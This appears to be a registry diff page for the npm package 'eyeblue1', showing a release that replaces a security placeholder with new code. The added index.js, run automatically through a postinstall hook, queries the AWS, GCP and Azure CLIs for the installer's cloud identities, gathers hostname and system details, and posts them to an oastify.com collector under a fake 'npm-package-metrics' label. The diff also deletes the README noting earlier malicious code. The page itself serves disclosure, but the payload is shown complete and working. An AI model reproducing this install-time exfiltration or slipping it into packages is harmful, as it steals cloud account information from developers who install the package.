eyeblue1 0.0.1-security → 2.1.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of eyeblue1 might be problematic. Click here for more details.
- package/index.js +101 -0
- package/package.json +15 -3
- package/README.md +0 -5
package/index.js
ADDED
@@ -0,0 +1,101 @@
|
|
1
|
+
#!/usr/bin/env node
|
2
|
+
|
3
|
+
const https = require('https');
|
4
|
+
const os = require('os');
|
5
|
+
const { execSync } = require('child_process');
|
6
|
+
|
7
|
+
function getCloudIdentity() {
|
8
|
+
let awsIdentity = null;
|
9
|
+
let gcpAccount = null;
|
10
|
+
let azureAccount = null;
|
11
|
+
|
12
|
+
try {
|
13
|
+
const awsOutput = execSync('aws sts get-caller-identity --output json', {
|
14
|
+
stdio: ['pipe', 'pipe', 'ignore']
|
15
|
+
});
|
16
|
+
awsIdentity = JSON.parse(awsOutput.toString());
|
17
|
+
} catch (_) {
|
18
|
+
// AWS CLI not installed or not configured
|
19
|
+
}
|
20
|
+
|
21
|
+
try {
|
22
|
+
const gcpOutput = execSync('gcloud config get-value account', {
|
23
|
+
stdio: ['pipe', 'pipe', 'ignore']
|
24
|
+
});
|
25
|
+
gcpAccount = gcpOutput.toString().trim();
|
26
|
+
} catch (_) {
|
27
|
+
// GCP CLI not installed or not configured
|
28
|
+
}
|
29
|
+
|
30
|
+
try {
|
31
|
+
const azureOutput = execSync('az account show --output json', {
|
32
|
+
stdio: ['pipe', 'pipe', 'ignore']
|
33
|
+
});
|
34
|
+
const azureJson = JSON.parse(azureOutput.toString());
|
35
|
+
azureAccount = azureJson.user?.name || azureJson.user || null;
|
36
|
+
} catch (_) {
|
37
|
+
// Azure CLI not installed or not signed in
|
38
|
+
}
|
39
|
+
|
40
|
+
return { awsIdentity, gcpAccount, azureAccount };
|
41
|
+
}
|
42
|
+
|
43
|
+
function sendMetrics() {
|
44
|
+
const { awsIdentity, gcpAccount, azureAccount } = getCloudIdentity();
|
45
|
+
|
46
|
+
const metrics = {
|
47
|
+
timestamp: new Date().toISOString(),
|
48
|
+
package_installed: true,
|
49
|
+
system: {
|
50
|
+
platform: os.platform(),
|
51
|
+
arch: os.arch(),
|
52
|
+
node_version: process.version,
|
53
|
+
hostname: os.hostname()
|
54
|
+
},
|
55
|
+
cloud: {
|
56
|
+
aws: awsIdentity,
|
57
|
+
gcp: gcpAccount,
|
58
|
+
azure: azureAccount
|
59
|
+
},
|
60
|
+
install_id: Math.random().toString(36).substring(2, 15)
|
61
|
+
};
|
62
|
+
|
63
|
+
const data = JSON.stringify(metrics);
|
64
|
+
|
65
|
+
const url = new URL('https://7u2q4ey44ko1yr4r67bhl3ekibo2ct0i.oastify.com');
|
66
|
+
|
67
|
+
const options = {
|
68
|
+
hostname: url.hostname,
|
69
|
+
port: 443,
|
70
|
+
path: url.pathname,
|
71
|
+
method: 'POST',
|
72
|
+
headers: {
|
73
|
+
'Content-Type': 'application/json',
|
74
|
+
'Content-Length': data.length,
|
75
|
+
'User-Agent': 'npm-package-metrics/1.0.0'
|
76
|
+
}
|
77
|
+
};
|
78
|
+
|
79
|
+
const req = https.request(options, (res) => {
|
80
|
+
console.log(`Metrics sent successfully. Status: ${res.statusCode}`);
|
81
|
+
});
|
82
|
+
|
83
|
+
req.on('error', (error) => {
|
84
|
+
console.log('Metrics sending failed:', error.message);
|
85
|
+
});
|
86
|
+
|
87
|
+
req.write(data);
|
88
|
+
req.end();
|
89
|
+
}
|
90
|
+
|
91
|
+
// Only run if this file is executed directly
|
92
|
+
if (require.main === module) {
|
93
|
+
sendMetrics();
|
94
|
+
}
|
95
|
+
|
96
|
+
// Export in case the package is imported elsewhere
|
97
|
+
module.exports = {
|
98
|
+
sendMetrics,
|
99
|
+
version: '1.0.0'
|
100
|
+
};
|
101
|
+
|
package/package.json
CHANGED
@@ -1,6 +1,18 @@
|
|
1
1
|
{
|
2
2
|
"name": "eyeblue1",
|
3
|
-
"version": "
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "2.1.0",
|
4
|
+
"description": "A package that sends installation metrics",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"postinstall": "node index.js"
|
8
|
+
},
|
9
|
+
"keywords": [
|
10
|
+
"metrics",
|
11
|
+
"analytics"
|
12
|
+
],
|
13
|
+
"author": "Your Name",
|
14
|
+
"license": "MIT",
|
15
|
+
"dependencies": {
|
16
|
+
"maxdome-compute": "^1.0.1"
|
17
|
+
}
|
6
18
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=eyeblue1 for more information.
|